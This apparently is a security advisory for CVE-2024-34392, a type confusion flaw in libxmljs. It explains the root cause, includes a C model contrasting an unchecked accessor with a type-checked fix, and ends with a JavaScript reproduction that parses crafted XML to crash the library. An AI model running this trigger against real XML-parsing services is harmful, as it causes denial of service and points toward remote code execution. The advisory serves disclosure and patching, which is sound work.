VYPR
Critical severity · OSV Advisory · Published May 2, 2024 · Updated Nov 25, 2024

libxmljs namespaces type confusion RCE

CVE-2024-34392

Description

libxmljs is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking the namespaces() function (which invokes _wrap__xmlNode_nsDef_get()) on a grand-child of a node that refers to an entity. This vulnerability can lead to denial of service and remote code execution.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package          Affected versions   Patched versions
libxmljs (npm)   <= 1.0.11           (not listed)


Vulnerability mechanics

Root cause

"A type confusion vulnerability exists in the SWIG-generated function _wrap__xmlNode_nsDef_get when processing XML with entities."

Attack vector

An attacker can trigger this vulnerability by parsing a specially crafted XML document. The vulnerability occurs when the namespaces() function is invoked with `onlyLocal` set to true on a grand-child of a node that refers to an entity. Specifically, a PUBLIC entity clause with a publicID can cause `nsDef` to point to the publicID string. This leads to a type confusion in `_wrap__xmlNode_nsDef_get` when it attempts to convert the pointer, potentially allowing for denial of service and remote code execution [ref_id=1].

Affected code

The vulnerability resides in the SWIG-generated function `_wrap__xmlNode_nsDef_get()`. This function is called by the `namespaces()` method in libxmljs when the `onlyLocal` parameter is set to true [ref_id=1]. The issue arises from how `SWIG_ConvertPtr` handles type conversions for `arg10` within this function.

What the fix does

The suggested fix is to add a check within `_wrap__xmlNode_nsDef_get()` to verify that the `arg10` parameter is indeed an `xmlNode`. This validation ensures that the function does not attempt to process incompatible types, thereby preventing the type confusion that could lead to exploitation.
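The check described above, as an added illustration that is not libxmljs or libxml2 code: a simplified model of two node kinds that share a common header but differ afterwards, so that the field an element uses for `nsDef` is, in an entity declaration, the PUBLIC identifier string. The struct and function names are assumptions made for this example; the enum values match libxml2's xmlElementType, and the sample publicID is constructed.

```c
#include <stddef.h>
#include <stdio.h>

/* Simplified model, not libxml2's real headers: every node kind starts with the
 * same header, but the fields after it differ per kind. The enum values are the
 * ones libxml2 uses for XML_ELEMENT_NODE and XML_ENTITY_DECL. */
enum model_type { MODEL_ELEMENT_NODE = 1, MODEL_ENTITY_DECL = 17 };

struct model_ns { const char *href; const char *prefix; };

/* Header shared by every node kind: the type tag is what a checked accessor
 * must inspect before trusting any kind-specific field. */
struct model_node_header {
    void *_private;
    int type;
    const char *name;
};

/* Element node: its namespace definitions follow the header. */
struct model_element {
    struct model_node_header hdr;
    struct model_ns *nsDef;
};

/* Entity declaration: at the offset where an element keeps nsDef, an entity
 * declaration keeps its PUBLIC identifier, a plain string. */
struct model_entity_decl {
    struct model_node_header hdr;
    const char *publicID;
};

/* Unchecked accessor: models a wrapper that trusts the caller's cast and reads
 * nsDef from whatever node it was handed. */
struct model_ns *nsdef_get_unchecked(void *node) {
    return ((struct model_element *)node)->nsDef;
}

/* Checked accessor: verify the node kind before touching element-only fields.
 * Returns 0 and sets *out on success; returns -1 and leaves *out NULL when the
 * node is not an element. */
int nsdef_get_checked(void *node, struct model_ns **out) {
    const struct model_node_header *hdr = node;
    *out = NULL;
    if (hdr->type != MODEL_ELEMENT_NODE)
        return -1;
    *out = ((struct model_element *)node)->nsDef;
    return 0;
}

/* Constructed sample data: an element with one namespace, and an entity
 * declaration whose PUBLIC id occupies the slot an element uses for nsDef. */
static struct model_ns sample_ns = { "http://example.invalid/ns", "x" };
static struct model_element sample_element = {
    { NULL, MODEL_ELEMENT_NODE, "from" }, &sample_ns
};
static const char sample_public_id[] = "AAAAAAAABBBBBBBB";
static struct model_entity_decl sample_entity = {
    { NULL, MODEL_ENTITY_DECL, "writer" }, sample_public_id
};

/* 1 if the unchecked path hands back the publicID bytes as if they were a
 * namespace definition: the type confusion. */
int unchecked_confuses_types(void) {
    struct model_ns *ns = nsdef_get_unchecked(&sample_entity);
    return (const void *)ns == (const void *)sample_public_id;
}

/* 1 if the checked path refuses the entity declaration outright. */
int checked_rejects_entity(void) {
    struct model_ns *ns = NULL;
    return nsdef_get_checked(&sample_entity, &ns) == -1 && ns == NULL;
}

/* 1 if the checked path still serves a genuine element normally. */
int checked_serves_element(void) {
    struct model_ns *ns = NULL;
    return nsdef_get_checked(&sample_element, &ns) == 0 && ns == &sample_ns;
}

int main(void) {
    printf("unchecked path misreads publicID as nsDef: %d\n", unchecked_confuses_types());
    printf("checked path rejects entity declaration:   %d\n", checked_rejects_entity());
    printf("checked path serves element normally:      %d\n", checked_serves_element());
    return 0;
}
```

The point of the model is the shape of the fix: the type tag lives in the shared header, so it is always safe to read, and consulting it before the kind-specific fields is what turns a silent misread of string bytes into a clean error the binding can report back to JavaScript.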

Preconditions

  • input: The system must parse a specially crafted XML document containing a PUBLIC entity clause with a publicID.

Reproduction

```javascript
const libxmljs = require('libxmljs');

// Crafted document: a PUBLIC entity declaration whose publicID string ends up
// where an element's nsDef pointer is expected.
const d = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY writer PUBLIC "` + "A".repeat(8) + "B".repeat(8) + "C".repeat(8) + "D".repeat(8) + "P".repeat(8) + `" "JFrog Security">
]>
<from>&writer;</from>
`;

const t = libxmljs.parseXml(d);
const from = t.get('//from');
const c = from.childNodes()[0];
const c2 = c.childNodes()[0];   // entity_decl
const n = c2.namespaces(true);  // onlyLocal = true
```

Run with: `$ node DoS.js` [ref_id=1]

Generated on Jun 7, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
